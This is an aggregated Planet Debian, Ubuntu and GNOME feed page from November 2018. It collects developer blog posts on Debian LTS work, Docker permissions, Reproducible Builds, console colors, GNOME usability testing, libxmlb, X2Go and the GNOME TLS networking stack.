You are here

Agreguesi i feed

Raphaël Hertzog: Freexian’s report about Debian Long Term Support, October 2018

Planet Ubuntu - Enj, 15/11/2018 - 3:36md

Like each month, here comes a report about the work of paid contributors to Debian LTS.

Individual reports

In October, about 209 work hours have been dispatched among 13 paid contributors. Their reports are available:

  • Abhijith PA did 1 hour (out of 10 hours allocated + 4 extra hours, thus keeping 13 extra hours for November).
  • Antoine Beaupré did 24 hours (out of 24 hours allocated).
  • Ben Hutchings did 19 hours (out of 15 hours allocated + 4 extra hours).
  • Chris Lamb did 18 hours (out of 18 hours allocated).
  • Emilio Pozuelo Monfort did 12 hours (out of 30 hours allocated + 29.25 extra hours, thus keeping 47.25 extra hours for November).
  • Holger Levsen did 1 hour (out of 8 hours allocated + 19.5 extra hours, but he gave back the remaining hours due to his new role, see below).
  • Hugo Lefeuvre did 10 hours (out of 10 hours allocated).
  • Markus Koschany did 30 hours (out of 30 hours allocated).
  • Mike Gabriel did 4 hours (out of 8 hours allocated, thus keeping 4 extra hours for November).
  • Ola Lundqvist did 4 hours (out of 8 hours allocated + 8 extra hours, but gave back 4 hours, thus keeping 8 extra hours for November).
  • Roberto C. Sanchez did 15.5 hours (out of 18 hours allocated, thus keeping 2.5 extra hours for November).
  • Santiago Ruano Rincón did 10 hours (out of 28 extra hours, thus keeping 18 extra hours for November).
  • Thorsten Alteholz did 30 hours (out of 30 hours allocated).
Evolution of the situation

In November we are welcoming Brian May and Lucas Kanashiro back as contributors after they took some break from this work.

Holger Levsen is stepping down as LTS contributor but is taking over the role of LTS coordinator that was solely under the responsibility of Raphaël Hertzog up to now. Raphaël continues to handle the administrative side, but Holger will coordinate the LTS contributors ensuring that the work is done and that it is well done.

The number of sponsored hours increased to 212 hours per month, we gained a new sponsor (that shall not be named since they don’t want to be publicly listed).

The security tracker currently lists 27 packages with a known CVE and the dla-needed.txt file has 27 packages needing an update.

Thanks to our sponsors

New sponsors are in bold.

No comment | Liked this article? Click here. | My blog is Flattr-enabled.

docker and exec permissions

Planet Debian - Mër, 14/11/2018 - 11:53md
# docker version|grep Version Version: 18.03.1-ce Version: 18.03.1-ce # cat Dockerfile FROM alpine RUN addgroup service && adduser -S service -G service COPY --chown=root:root debug.sh /opt/debug.sh RUN chmod 544 /opt/debug.sh USER service ENTRYPOINT ["/opt/debug.sh"] # cat debug.sh #!/bin/sh ls -l /opt/debug.sh whoami # docker build -t foobar:latest .; docker run foobar Sending build context to Docker daemon 5.12kB [...] Sucessfully built 41c8b99a6371 Successfully tagged foobar:latest -r-xr--r-- 1 root root 37 Nov 14 22:42 /opt/debug.sh service # docker version|grep Version Version: 18.09.0 Version: 18.09.0 # docker run foobar standard_init_linux.go:190: exec user process caused "permission denied"

That changed with 18.06 and just uncovered some issues. I was, well let's say "surprised", that this ever worked at all. Other sets of perms like 0700 or 644 already failed with different error message on docker 18.03.1.

Sven Hoexter http://sven.stormbind.net/blog/ a blog

Visiting London

Planet Debian - Mër, 14/11/2018 - 2:42md

I'm visiting London the rest of the week (November 14th–18th) to watch match 5 and 6 of the Chess World Championship. If you're in the vicinity and want to say hi, drop me a note. :-)

Steinar H. Gunderson http://blog.sesse.net/ Steinar H. Gunderson

Alerts in Weblate to indicate problems with translations

Planet Debian - Mër, 14/11/2018 - 2:15md

Upcoming Weblate 3.3 will bring new feature called alerts. This is one place location where you will see problems in your translations. Right now it mostly covers Weblate integration issues, but it will be extended in the future for deeper translation wide diagnostics.

This will help users to better integrate Weblate into the development process giving integration hints or highlighting problems Weblate has found in the translation. It will identify typical problems like not merged git repositories, parse errors in files or duplicate translation files. You can read more on this feature in the Weblate documentation.

You can enjoy this feature on Hosted Weblate right now, it will be part of upcoming 3.3 release.

Filed under: Debian English SUSE Weblate

Michal Čihař https://blog.cihar.com/archives/debian/ Michal Čihař's Weblog, posts tagged by Debian

Tiago Carrondo: S01E10 – Tendência livre

Planet Ubuntu - Mër, 14/11/2018 - 3:02pd

Desta vez com um convidado, o Luís Costa, falámos muito sobre hardware, hardware livre e como não poderia deixar de ser: dos novos produtos da Libretrend, as novíssimas Librebox. Em mês de eventos a agenda teve um especial destaque com as actualizações disponíveis de todos os encontros e eventos anunciados! Já sabes: Ouve, subscreve e partilha!

Patrocínios

Este episódio foi produzido e editado por Alexandre Carrapiço (Thunderclaws Studios – captação, produção, edição, mistura e masterização de som) contacto: thunderclawstudiosPT–arroba–gmail.com.

Atribuição e licenças

A imagem de capa: richard ling em Visualhunt e está licenciada como CC BY-NC-ND.

A música do genérico é: “Won’t see it comin’ (Feat Aequality & N’sorte d’autruche)”, por Alpha Hydrae e está licenciada nos termos da CC0 1.0 Universal License.

Este episódio está licenciado nos termos da licença: Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0), cujo texto integral pode ser lido aqui. Estamos abertos a licenciar para permitir outros tipos de utilização, contactem-nos para validação e autorização.

Reproducible Builds: Weekly report #185

Planet Debian - Mar, 13/11/2018 - 2:56md

Here’s what happened in the Reproducible Builds effort between Sunday November 4 and Saturday November 10 2018:

Packages reviewed and fixed, and bugs filed diffoscope development

diffoscope is our in-depth “diff-on-steroids” utility which helps us diagnose reproducibility issues in packages. This week, version 105 was uploaded to Debian unstable by Mattia Rizzolo. It included contributions already covered in previous weeks as well as new ones from:

Website updates

There were a large number of changes to our website this week:

In addition to that we had contributions from Deb Nicholson, Chris Lamb, Georg Faerber, Holger Levsen and Mattia Rizzolo et al. on the press release regarding joining the Software Freedom Conservancy:

Test framework development

There were a large number of updates to our Jenkins-based testing framework that powers tests.reproducible-builds.org by Holger Levsen this week (see below). The most important work was done behind the scenes outside of Git which was a long debugging session to find out why the Jenkins Java processes were suddenly consuming all of the system resources whilst the machine had a load of 60-200. This involved temporarily removing all 1,300 jobs, disabling plugins and other changes. In the end, it turned out that the underlying SSH/HDD performance was configured poorly and, after this was fixed, Jenkins returned to normal.

In addition, Mattia Rizzolo fixed an issue in the web-based package rescheduling tool by encoding a string before passing to subprocess.run and to fix the parsing of the “issue” selector option.

This week’s edition was written by Arnout Engelen, Bernhard M. Wiedemann, Chris Lamb, Holger Levsen, Oskar Wirga, Santiago Torres, Snahil Singh & reviewed by a bunch of Reproducible Builds folks on IRC & the mailing lists.

Reproducible builds folks https://reproducible-builds.org/blog/ reproducible-builds.org

Jim Hall: Why the Linux console has sixteen colors (SeaGL)

Planet GNOME - Hën, 12/11/2018 - 9:00md
At the 2018 Seattle GNU/Linux Conference after-party, I gave a lightning talk about why the Linux console has only sixteen colors. Lightning talks are short, fun topics. I enjoyed giving the lightning talk, and the audience seemed into it, too. So I thought I'd share my lightning talk here. These are my slides in PNG format, with notes added:
Also, my entire presentation is under the CC-BY:
When you bring up a terminal window, or boot Linux into plain text mode, maybe you've wondered why the Linux console only has sixteen colors. No matter how awesome your graphics card, you only get these sixteen colors for text:
You can have eight background colors, and sixteen foreground colors. But why is that?
Remember that Linux is a PC operating system, so you have to go back to the early days of the IBM PC. Although the rules are the same for any Unix terminal.

The origins go back to CGA, the Color/Graphics Adapter from the earlier PC-compatible computers. This was a step up from the plain monochrome displays; as the name implies, monochrome could only display black or white. CGA could display a limited range of colors.

CGA supported mixing red (R), green (G) and blue (B) colors. In its simplest form, RGB is either "on" or "off." In this case, you can mix the RGB colors in 2×2×2=8 ways. So RGB=100 is Red, and RGB=010 is Green, and RGB=001 is Blue. And you can mix colors, like RGB=011 is cyan. This simple table shows the binary and decimal representations of RGB:
To double the number of colors, CGA added an extra bit called the "intensifier" bit. With the intensifier bit set, the red, green and blue colors would be set to their maximum values. Without the intensifier bit, each RGB value would be set to a "midrange" intensity. Let's represent that intensifier bit as an extra 1 or 0 in the binary color representation, as iRGB:
That means 0100 gives "red" and 1100 (with intensifier bit set) results in "bright red." Also, 0010 is "green" and 1010 is "bright green." And 0000 is "black," but 1000 is "bright black."

Oh wait, there's a problem. "Black" and "bright black" are the same color, because there's no RGB value to intensify.

But we can solve that! CGA actually implemented a modified iRGB definition, using two intermediate values, at about one-third and two-thirds intensity. Most "normal" mode (0–7) colors used values at the two-thirds intensity. Translating from "normal" mode to "bright" mode, convert zero values to the one-third intensity, and two-thirds values to full intensity.

With that, you can represent all the colors in the rainbow: red, orange, yellow, blue, indigo, and violet. You can sort of fake the blue, indigo, and violet with the different "blue" shades.

Oops, we don't have orange! But we can fix that by assigning 0110 yellow a one-third green value that turned the color into orange, although most people saw it as brown.

Here's another iteration of the color table, using 0x0 to 0xF for the color range, with 0x5 and 0xA as the one-third and two-thirds intensities, respectively:
And that's how the Linux console got sixteen text colors! That's also why you'll often see "brown" labeled "yellow" in some references, because it started out as plain "yellow" before the intensifier bit. Similarly, you may also see "gray" represented as "bright black," because "gray" is really "black" with the intensifier bit set.

So let's look at the bit patterns. You have four bits for the foreground color, 0000 black to 1111 bright white:
And you have three bits for the background color, from 000 black to 111 white:
But why not four bits for the background color? That's because the final bit is reserved for a special attribute. With this attribute set, your text could blink on and off. The "Blink" bit was encoded at the end of the foreground and background bit-pattern:
That's a full byte! And that's why the Linux console has only sixteen colors; the Linux console inherits text mode colors from CGA, which encodes colors a full byte at a time.

It turns out the rules are the same for other Unix terminals, which also used eight bits to represent colors. But on other terminals, 0110 really was yellow, not orange or brown.

Jim Hall: Usability Testing in Open Source Software (SeaGL)

Planet GNOME - Hën, 12/11/2018 - 5:02md
I recently attended the 2018 Seattle GNU/Linux Conference, where I gave a presentation about usability testing in open source software. I promised to share my presentation deck. Here are my slides in PNG format, with notes added:
Also, my entire presentation is under the CC-BY:
I've been involved in Free/open source software since 1993, but recently I developed an interest in usability testing in open source software. During a usability testing class in my Master's program in Scientific and Technical Communication (MS) I studied the usability of GNOME and Firefox. Later, I did a deeper examination of the usability of open source software, focusing on GNOME, as part of my Master's capstone. (“Usability Themes in Open Source Software,” 2014.)

Since then, I've joined the GNOME Design Team where I help with usability testing.

I also (sometimes) teach usability at the University of Minnesota. (CSCI 4609 Processes, Programming, and Languages: Usability of Open Source Software.)
I’ve worked with others on usability testing since then. I have mentored in Outreachy, formerly the Outreach Program for Women. Sanskriti, Gina, Renata, Ciarrai, Diana were all interns in usability testing. Allan and Jakub from the GNOME Design Team co-mentored as advisers.
What do we mean when we talk about “usability”? You can find some formal definitions of usability that talk about the Learnability, Efficiency, Memorability, Errors, and Satisfaction. But I find it helps to have a “walking around” definition of usability.

A great way to summarize usability is to remember that real people are busy people, and they just need to get their stuff done. So a program will have good usability if real people can do real tasks in a realistic amount of time.

User eXperience (UX) is technically not the same as usability. Where usability is about real people doing real tasks in a reasonable amount of time, UX is more about the emotional connection or emotional response the user has when using the software.

You can test usability in different ways. I find the formal usability test and prototype test work well. You can also indirectly examine usability, such as using an expert to do a heuristic evaluation, or using questionnaires. But really, nothing can replace watching a real person trying to use your software; you will learn a lot just by observing others.
People think it's hard to do usability testing, but it's actually easy to do a usability test on your own. You don’t need a fancy usability lab or any professional experience. You just need to want to make your program easier for other people to use.

If you’re starting from scratch, you really have three steps to do a formal usability test:

1. Consider who are your users. Write this down as a short paragraph for each kind of user for your software. Make it a realistic fiction. These are your Personas. With personas, you can make design decisions that always benefit the user. “If we change __ then that will make it easier for users like Jane.” “If we add __ then that will help people like Steve.”

2. For each persona, write a brief statement about why that user might use the software to do their tasks. There are different ways that a user might use the software, but just jot down one way. This is a Use Scenario. With scenarios, you can better understand the circumstances when people use the software.

3. Now take a step back and think about the personas and scenarios. Write down some realistic tasks that real people would do with the software. Make each one stand on its own. These are scenario tasks, and they make up your actual usability test. Where you should write personas and scenarios in third-person (“__ does this..”) you should write scenario tasks in second-person (“you do this..”) Each scenario task should set up a brief context, then ask the tester to do something specific. For example:

You don’t have your glasses with you, so it’s hard to see the text on the screen. Make the text bigger so you can read it more easily.

The challenge in scenario tasks is not to accidentally give hints for what the tester should do. Avoid using the same words and phrases from menus. Don’t be too exact about what the tester should do - instead, describe the goal, and let the tester find their own path. Remember that there may be more than one way to do something.

The key in doing a usability test is to make it iterative. Do a usability test, analyze your results, then make changes to the design based on what you learned in the test. Then do another test. But how many testers do you need?
You don’t need many testers to do a usability test if you do it iteratively. Doing a usability test with five testers is enough to learn about the usability problems and make tweaks to the interface. At five testers, you’ve uncovered more than 80% of usability problems, assuming most testers can uncover about 31% of issues (typical).

But you may need more testers for other kinds of usability tests. “Only five” works well for traditional/formal usability tests. For a prototype test, you might need more testers.

But five is enough for most tests.
If every tester can uncover about 31% of usability problems, then note what happens when you have one, five, and ten testers in a usability test. You can cover 31% with one tester. With more testers, you have overlap in some areas, but you cover more ground with each tester. At five testers, that’s pretty good coverage. At ten testers, you don’t have considerably better coverage, just more overlap.

I made this sample graphic to demonstrate. The single red square covers 31% of the grey square's area (in the same way a tester can usually uncover about 31% of the usability problems, if you've designed your test well). Compare five and ten testers. You don't get significantly more coverage at ten testers than at five testers. You get some extra coverage, and more overlap, but that's a lot of extra effort for not a lot of extra value. Five is really all you need.
Let me show you a usability test that I did. Actually, I did two of them. This was part of my work on my Master’s degree. My capstone was Usability Themes in Open Source Software. Hall, James. (2014). Usability Themes in Open Source Software. University of Minnesota.

I wrote up the results for each test as separate articles for Linux Journal: “The Usability of GNOME” (December, 2014) and “It’s about the user: Usability in open source software” (December, 2013).
I like to show results in a “heat map.” A heat map is just a convenient way to show test results. Scenario tasks are in rows and each tester is a separate column.

For each cell (a tester doing a task) I use a color to show how easy or how difficult that task was for the tester. I use this scale:

—Green if the tester easily completed the task. For example, if the tester seemed to know exactly what to do, what menu item to activate or which icon to click, you would code the task in green for that tester.

—Yellow if the tester experienced some (but not too much) difficulty in the task.

—Orange if the tester had some trouble in the task. For example, if the tester had to poke around the menus for a while to find the right option, or had to hunt through toolbars and selection lists to locate the appropriate icon, you would code the task in orange for that tester.

—Red if the tester experienced severe difficulty in completing the task.

—Black if the tester was unable to figure out how to complete the task, and gave up.

There are some “hot” rows here, which show tasks that were difficult for testers: setting the font and colors in gedit, and setting a bookmark in Nautilus. Also searching for a file in Nautilus was a bit challenging, too. So my test recommended that the GNOME Design Team focus on these four to make them easier to do.
This next one is the heat map from my capstone project.

Note that I tried to do a lot here. You need to be realistic in your time. Try for about an hour (that’s what I did) but make sure your testers have enough time. The gray “o” in each cell is where we didn’t have enough time do that task.

You can see some “hot rows” here too: setting the font in gedit, and renaming a folder in Nautilus. And changing all instances of some words in gedit, and installing a program in Software, and maybe creating two notes in Notes.
Most of the interns did a traditional usability test. So that’s what Sanskriti did here:
Sanskriti did a usability test that was similar to mine, so we could measure changes. She had a slightly different color map here, using two tones for green. But you can see a few hot rows: changing the default colors in gedit, adding photos to an album in Photos, and setting a photo as a desktop wallpaper from Photos. Also some warm rows in creating notes in Notes, and creating a new album in Photos.
Gina was from my second cycle in Outreachy, and she did another traditional usability test:
You can see some hot rows in Gina's test: bookmarking a location in Nautilus, adding a special character (checkmark) using Characters and Evince, and saving the location (bookmark) in Evince. Also some warm rows: changing years in Calendar, and saving changes in Evince. Maybe searching for a file in Nautilus.

Gina did such great work that we co-authored an article in FOSS Force: "A Usability Study of GNOME" (March, 2016).
In the next cycle of Outreachy, we had three interns: Gina, Ciarrai and Diana. Renata did a traditional usability test:
In Renata’s heat map, you can see some hot rows: creating an album in Photos, adding a new calendar in Calendar, and connecting to an online account in Calendar. And maybe deleting a photo in Photos and setting a photo as a wallpaper image in Photos. Some issues in searching for a date in Calendar, and creating an event in Calendar.

See also our article in Linux Voice Magazine: "GNOME Usability Testing" (November, 2016, Issue 32).
Ciarrai did a prototype test for a future design change to the GNOME Settings application:
In the future Settings, the Design Team thought they’d have a list of categories down the side. Clicking on a category shows you the settings for that category. Here’s a mock-up for Wi-Fi in the new Settings. You can see the list of other categories down the left side:
Remember the “only five” slide from a while back? That’s only for traditional/formal usability tests. For a prototype test, we didn’t think five was enough, so Ciarrai did ten testers.

For Ciarrai’s heat map, we used slightly different colors because the tester wasn’t actually using the software. They were pointing to a paper printout. Here, green indicates the tester knew exactly what to point to, and red indicates they pointed to the wrong one. Or for some tasks that had sub-panels, orange indicates they got to the first panel, and failed to get to the second setting.

You can see some hot rows, indicating where people didn’t know what category would have the Settings option they were looking for: Monitor colors, and Screen lock time. Also Time zone, Default email client, and maybe Bluetooth and Mute notifications.
Other open source projects have adopted the same usability test methods to examine usability. Debian did a usability test of GNOME. Here’s their test: (*original)
They had more general “goals” for testers, called “missions.” Similar to scenario tasks, the missions had a more broad goal that provided some flexibility for the tester. But not very different from scenario tasks.

You can see some hot rows here: temporary files and change default video program in Settings, and installing/removing packages in Package Management. Also some issues in creating a bookmark in Nautilus, and adding/removing other clocks in Settings.
If you want more information, please visit my blog or email me.
I hope this helps you to do usability testing on your own programs. Usability is not hard! Anyone can do it!

Richard Hughes: More fun with libxmlb

Planet GNOME - Hën, 12/11/2018 - 4:51md

A few days ago I cut the 0.1.4 release of libxmlb, which is significant because it includes the last three features I needed in gnome-software to achieve the same search results as appstream-glib.

The first is something most users of database libraries will be familiar with: Bound variables. The idea is you prepare a query which is parsed into opcodes, and then at a later time you assign one of the ? opcode values to an actual integer or string. This is much faster as you do not have to re-parse the predicate, and also means you avoid failing in incomprehensible ways if the user searches for nonsense like ]@attr. Borrowing from SQL, the syntax should be familiar:

g_autoptr(XbQuery) query = xb_query_new (silo, "components/component/id[text()=?]/..", &error); xb_query_bind_str (query, 0, "gimp.desktop", &error);

The second feature makes the caller jump through some hoops, but hoops that make things faster: Indexed queries. As it might be apparent to some, libxmlb stores all the text in a big deduplicated string table after the tree structure is defined. That means if you do <component component="component">component</component> then we only store just one string! When we actually set up an object to check a specific node for a predicate (for instance, text()='fubar' we actually do strcmp("fubar", "component") internally, which in most cases is very fast…

Unless you do it 10 million times…

Using indexed strings tells the XbMachine processing the predicate to first check if fubar exists in the string table, and if it doesn’t, the predicate can’t possibly match and is skipped. If it does exist, we know the integer position in the string table, and so when we compare the strings we can just check two uint32_t’s which is quite a lot faster, especially on ARM for some reason. In the case of fwupd, it is searching for a specific GUID when returning hardware results. Using an indexed query takes the per-device query time from 3.17ms to about 0.33ms – which if you have a large number of connected updatable devices makes a big difference to the user experience. As using the indexed queries can have a negative impact and requires extra code it is probably only useful in a handful of cases. In case you do need this feature, this is the code you would use:

xb_silo_query_build_index (silo, "component/id", NULL, &error); // the cdata xb_silo_query_build_index (silo, "component", "type", &error); // the @type attr g_autoptr(XbNode) n = xb_silo_query_first (silo, "component/id[text()=$'test.firmware']", &error);

The indexing being denoted by $'' rather than the normal pair of single quotes. If there is something more standard to denote this kind of thing, please let me know and I’ll switch to that instead.

The third feature is: Stemming; which means you can search for “gaming mouse” and still get results that mention games, game and Gaming. This is also how you can search for words like Kongreßstraße which matches kongressstrasse. In an ideal world stemming would be computationally free, but if we are comparing millions of records each call to libstemmer sure adds up. Adding the stem() XPath operator took a few minutes, but making it usable took up a whole weekend.

The query we wanted to run would be of the form id[text()~=stem('?') but the stem() would be called millions of times on the very same string for each comparison. To fix this, and to make other XPath operators faster I implemented an opcode rewriting optimisation pass to the XbMachine parser. This means if you call lower-case(text())==lower-case('GIMP.DESKTOP') we only call the UTF-8 strlower function N+1 times, rather than 2N times. For lower-case() the performance increase is slight, but for stem it actually makes the feature usable in gnome-software. The opcode rewriting optimisation pass is kinda dumb in how it works (“lets try all combinations!”), but works with all of the registered methods, and makes all existing queries faster for almost free.

One common question I’ve had is if libxmlb is supposed to obsolete appstream-glib, and the answer is “it depends”. If you’re creating or building AppStream metadata, or performing any AppStream-specific validation then stick to the appstream-glib or appstream-builder libraries. If you just want to read AppStream metadata you can use either, but if you can stomach a binary blob of rewritten metadata stored somewhere, libxmlb is going to be a couple of orders of magnitude faster and use a ton less memory.

If you’re thinking of using libxmlb in your project send me an email and I’m happy to add more documentation where required. At the moment libxmlb does everything I need for fwupd and gnome-software and so apart from bugfixes I think it’s basically “done”, which should make my manager somewhat happier. Comments welcome.

Results produced while at "X2Go - The Gathering 2018" in Stuttgart

Planet Debian - Hën, 12/11/2018 - 3:25md

Over the last weekend, I have attended the FLOSS meeting "X2Go - The Gathering 2018" [1]. The event took place at the shackspace maker space in Ulmerstraße in Stuttgart-Wangen (near S-Bahn station S-Untertürkheim). Thanks to the people from shackspace for hosting us there, I highly enjoyed your location's environment. Thanks to everyone who joined us at the meeting. Thanks to all event sponsors (food + accomodation for me). Thanks to Stefan Baur for being our glorious and meticulous organizer!!!

Thanks to my family for letting me go for that weekend.

Especially, a big thanks to everyone, that I was allowed to bring our family dog "Capichera" with me to the event. While Capichera adapted quite ok to this special environment on sunny Friday and sunny Saturday, he was not really feeling well on rainy Sunday (aching joints, unwilling to move, walk interact).

For those interested and especially for our event sponsors, below you can find a list of produced results related to the gathering.

light+love
Mike

2018-11-09 Mike Gabriel (train ride + @ X2Go Gathering 2018)
  • X2Go: Port x2godesktopsharing to Qt5.
  • Arctica: Release librda 0.0.2 (upstream) and upload librda 0.0.2-1 to Debian unstable (as NEW).
  • Arctica: PR reviews and merges:
  • Arctica: Fix autobuilders (add libxkbfile-dev locally to the build systems' list of packages, required for latest nx-libs with xkb-1.3.0.0 branch merged).
  • Arctica: Fix (IMAKE_)FONT_DEFINES build logic in nx-libs (together with Ulrich Sibiller)
  • X2Go: Explain X2Go Desktop Sharing to one of the event sponsors.
  • Discuss various W-I-P branches in nx-libs and check their development status with the co-maintainers.
  • Debian: Upload to stretch-backports: mate-tweak 18.10.2-1~bpo9+1.
  • Debian: Upload to stretch-backports: mate-icon-theme 1.20.2-1~bpo9+1.
2018-11-10 - Mike Gabriel (@ X2Go Gathering 2018)
  • my tool chain: make my smtp_tunnel script more robust and specific about which autossh tunnel to take down. Add "up" and "down" as first argument, so now I can now also take down the autossh tunnel for SMTP (as opposed to doing killall autossh unspecifically).
  • Talks:
    • Discussion Slot - more general NX-Libs discussion (BIG-REQUESTS, Xinerama, Telekinesis)
    • Demo: Arctica Greeter with X2Go Logon
    • Demo/Discussion: Current state of the Python Broker, Feature Requests
    • Discussion Slot - more general NX-Libs discussion (Software rendering, OpenGL, GLX, … how is that all related? And would we be able to speed things up in a Telekinesis-like approach somehow?)
  • Cooking: : Prepare nearly vegan (the carrots had butter), organic Italian pasta (with salad and ciabatta bread) for the group. Together with Ritchi and Thomas. Much appreciation to plattsalat e.V. [2] for sponsoring the food.
  • PyHoca-CLI: Fix normal password authentication (i.e. for users that don't use SSH priv/pub keys).
  • Python X2Go / PyHoca-cli: Add check directly after authentication that exits with error, if the remote server has the X2Go Server software installed. Bail out, if not.
  • X2Go Consulting: Demo possible approach for having X2Go in the webbrowser again to Martti Pikanen.
2018-11-11 - Mike Gabriel (@ X2Go Gathering 2018 + train ride)
  • Debian: Port pinentry-x2go to Qt5, upload to unstable pinentry-x2go 0.7.5.9-3.
  • X2Go: Apply changes on top of pinentry-x2go 0.7.5.10 upstream.
  • Talks:
    • Quick introduction to librda.
  • Debian: Upload to unstable: mate-polkit 1.20.1-2.
  • X2Go: Work on x2godesktopsharing upstream:
    • allow system-wide default settings
    • store sharing group in settings (instead of hard-coding a POSIX group name)
    • rewrite the access grant/deny dialog
  • Debian: Prepare Debian package for x2godesktopsharing.
    • debconf: make the sharing group name selectable
    • debconf: auto-start desktop sharing
    • debconf: auto-activate desktop sharing when started
References sunweaver http://sunweavers.net/blog/blog/1 sunweaver's blog

Review: The "Trojan Room" coffee

Planet Debian - Hën, 12/11/2018 - 1:20md

I was recently invited to give a seminar at the Cambridge University's Department of Computer Science and Technology on the topic of Reproducible Builds.

Whilst it was an honour to have been asked, it also afforded an opportunity to drink coffee from the so-called "Trojan Room" which previously housed the fabled Computer Laboratory coffee pot:

For those unaware of the background, to save hackers in the building from finding the coffee machine empty, a camera was setup on the local network in 1991 using an Acorn Archimedes to capture a live 128×128 image of the pot, thus becoming the world's first webcam.

According to Quentin Stafford-Fraser, the technical limitations at the time did not matter:

The image was only updated about three times a minute, but that was fine because the pot filled rather slowly, and it was only greyscale, which was also fine, because so was the coffee.

Whilst the original pot was sold for £3,350 in 2001 what, you may ask, did I think of the coffee I sampled? Did the historical weight of the room imbue a certain impalpable quality into the beverage itself? Perhaps this modern hacker lore inspired deep intellectual thoughts in myself? Did it infuse a superlative and indefinable depth of flavour that belied the coffee's quotidian origins…?

No, it did not.

(Thanks to Allison Randal for arranging this opportunity.)

Chris Lamb https://chris-lamb.co.uk/blog/category/planet-debian lamby: Items or syndication on Planet Debian.

Michael Catanzaro: The GNOME (and WebKitGTK+) Networking Stack

Planet GNOME - Hën, 12/11/2018 - 5:52pd

WebKit currently has four network backends:

  • CoreFoundation (used by macOS and iOS, and thus Safari)
  • CFNet (used by iTunes on Windows… I think only iTunes?)
  • cURL (used by most Windows applications, also PlayStation)
  • libsoup (used by WebKitGTK+ and WPE WebKit)

One guess which of those we’re going to be talking about in this post. Yeah, of course, libsoup! If you’re not familiar with libsoup, it’s the GNOME HTTP library. Why is it called libsoup? Because before it was an HTTP library, it was a SOAP library. And apparently somebody thought that when Mexican people say “soap,” it often sounds like “soup,” and also thought that this was somehow both funny and a good basis for naming a software library. You can’t make this stuff up.

Anyway, libsoup is built on top of GIO’s sockets APIs. Did you know that GIO has Object wrappers for BSD sockets? Well it does. If you fancy lower-level APIs, create a GSocket and have a field day with it. Want something a bit more convenient? Use GSocketClient to create a GSocketConnection connected to a GNetworkAddress. Pretty straightforward. Everything parallels normal BSD sockets, but the API is nice and modern and GObject, and that’s really all there is to know about it. So when you point WebKitGTK+ at an HTTP address, libsoup is using those APIs behind the scenes to handle connection establishment. (We’re glossing over details like “actually implementing HTTP” here. Trust me, libsoup does that too.)

Things get more fun when you want to load an HTTPS address, since we have to add TLS to the picture, and we can’t have TLS code in GIO or GLib due to this little thing called “copyright law.” See, there are basically three major libraries used to implement TLS on Linux, and they all have problems:

  • OpenSSL is by far the most popular, but it’s, hm, shall we say technically non-spectacular. There are forks, but the forks have problems too (ask me about BoringSSL!), so forget about them. The copyright problem here is that the OpenSSL license is incompatible with the GPL. (Boring details: Red Hat waves away this problem by declaring OpenSSL a system library qualifying for the GPL’s system library exception. Debian has declared the opposite, so Red Hat’s choice doesn’t gain you anything if you care about Debian users. The OpenSSL developers are trying to relicense to the Apache license to fix this, but this process is taking forever, and the Apache license is still incompatible with GPLv2, so this would make it impossible to use GPLv2+ software except under the terms of GPLv3+. Yada yada details.) So if you are writing a library that needs to be used by GPL applications, like say GLib or libsoup or WebKit, then it would behoove you to not use OpenSSL.
  • GnuTLS is my favorite from a technical standpoint. Its license is LGPLv2+, which is unproblematic everywhere, but some of its dependencies are licensed LGPLv3+, and that’s uncomfortable for many embedded systems vendors, since LGPLv3+ contains some provisions that make it difficult to deny you your freedom to modify the LGPLv3+ software. So if you rely on embedded systems vendors to fund the development of your library, like say libsoup or WebKit, then you’re really going to want to avoid GnuTLS.
  • NSS is used by Firefox. I don’t know as much about it, because it’s not as popular. I get the impression that it’s more designed for the needs of Firefox than as a Linux system library, but it’s available, and it works, and it has no license problems.

So naturally GLib uses NSS to avoid the license issues of OpenSSL and GnuTLS, right?

Haha no, it uses a dynamically-loadable extension point system to allow you to pick your choice of OpenSSL or GnuTLS! (Support for NSS was started but never finished.) This is OK because embedded systems vendors don’t use GPL applications and have no problems with OpenSSL, while desktop Linux users don’t produce tivoized embedded systems and have no problems with LGPLv3. So if you’re using desktop Linux and point WebKitGTK+ at an HTTPS address, then GLib is going to load a GIO extension point called glib-networking, which implements all of GIO’s TLS APIs — notably GTlsConnection and GTlsCertificate — using GnuTLS. But if you’re building an embedded system, you simply don’t build or install glib-networking, and instead build a different GIO extension point called glib-openssl, and libsoup will create GTlsConnection and GTlsCertificate objects based on OpenSSL instead. Nice! And if you’re Centricular and you’re building GStreamer for Windows, you can use yet another GIO extension point, glib-schannel, for your native Windows TLS goodness, all hidden behind GTlsConnection so that GStreamer (or whatever application you’re writing) doesn’t have to know about SChannel or OpenSSL or GnuTLS or any of that sad complexity.

Now you know why the TLS extension point system exists in GIO. Software licenses! And you should not be surprised to learn that direct use of any of these crypto libraries is banned in libsoup and WebKit: we have to cater to both embedded system developers and to GPL-licensed applications. All TLS library use is hidden behind the GTlsConnection API, which is really quite nice to use because it inherits from GIOStream. You ask for a TLS connection, have it handed to you, and then read and write to it without having to deal with any of the crypto details.

As a recap, the layering here is: WebKit -> libsoup -> GIO (GLib) -> glib-networking (or glib-openssl or glib-schannel).

So when Epiphany fails to load a webpage, and you’re looking at a TLS-related error, glib-networking is probably to blame. If it’s an HTTP-related error, the fault most likely lies in libsoup. Same for any other GNOME applications that are having connectivity troubles: they all use the same network stack. And there you have it!

P.S. The glib-openssl maintainers are helping merge glib-openssl into glib-networking, such that glib-networking will offer a choice of GnuTLS or OpenSSL and obsoleting glib-openssl. This is still a work in progress. glib-schannel will be next!

P.S.S. libcurl also gives you multiple choices of TLS backend, but makes you choose which at build time, whereas with GIO extension points it’s actually possible to choose at runtime from the selection of installed extension points. The libcurl approach is fine in theory, but creates some weird problems, e.g. different backends with different bugs are used on different distributions. On Fedora, it used to use NSS, but now uses OpenSSL, which is fine for Fedora, but would be a license problem elsewhere. Debian actually builds several different backends and gives you a choice, unlike everywhere else. I digress.

Achievement unlocked! I spoke at PythonBrasil[14]

Planet Debian - Hën, 12/11/2018 - 3:49pd
PyLadies (and going to PythonBrasil)

PythonBrasil is the national Python community conference that happens every year, usually in October, in Brazil.

I attended PythonBrasil for the first time in 2016, the year we had started PyLadies Porto Alegre. Back then, we were a very small group and I was the only one to go. It was definitely one of the best experiences I ever had, which, of course, set a very high standard for every single tech event I attended afterwards.

Because of the great time I had there, I wanted to bring more and more women from PyLadies Porto Alegre to experience PythonBrasil in the next editions. So, during the PyLadies Porto Alegre 1st birthday party, I encouraged the other women to submit activities to try and to go to the conference that would happen in Belo Horizonte.
